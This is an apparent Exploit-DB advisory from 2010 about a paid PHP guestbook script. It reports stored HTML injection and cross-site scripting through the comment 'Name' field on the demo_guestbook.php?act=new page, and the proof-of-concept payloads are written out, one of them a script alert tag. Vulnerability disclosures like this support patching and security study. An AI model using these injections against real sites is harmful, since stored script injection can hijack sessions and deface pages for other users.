Guestbook Script PHP - Cross-Site Scripting / HTML Injection

EDB-ID:

14648

CVE:

N/A




Platform:

PHP

Date:

2010-08-15


=======================================================================
# GuestBook Script PHP (XSS/HTML Injection) Multiple Vulnerabilities
=======================================================================
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
#################################
#      _____ __    __  /_  __/  #
#     / ___/ \ \  / /   / /     #
#    (__  )   \ \/ /   / /      #
#   /____/     \__/   /_/       #
#################################
# Vendor: http://www.guestbookscripts.com/demo_guestbook.php
# Date: 2010-08-15
# Author: AnTi SeCuRe
# Greets: Sa-ViRuS.CoM , RENO , Dr.php , ! BaD BoY ! , Gov.HaCker , Dr.$audi all Sa-ViRuS.CoM Members ..
# Contact: AnTi-SeCuRe@HoTMaiL.CoM
# Home: WwW.Sa-ViRuS.CoM
########################################################################

[~]Note : Its not free ,, Its By 17,99
[~]You Can Buy It From : http://www.guestbookscripts.com/buy_guestbook.php


[~] HTML Injection Vuln . : http://server/demo_guestbook.php?act=new
Add A New Comment And The exploit is in Name :)
<p align="center"><b>Sa-ViRuS.CoM</b></p>



[~] Xss Vuln. : http://server/demo_guestbook.php?act=new
Add A New Comment And The exploit is in Name :)
<script>alert('AnTi SeCuRe - Sa-ViRuS.CoM')</script>



Thx To : Allah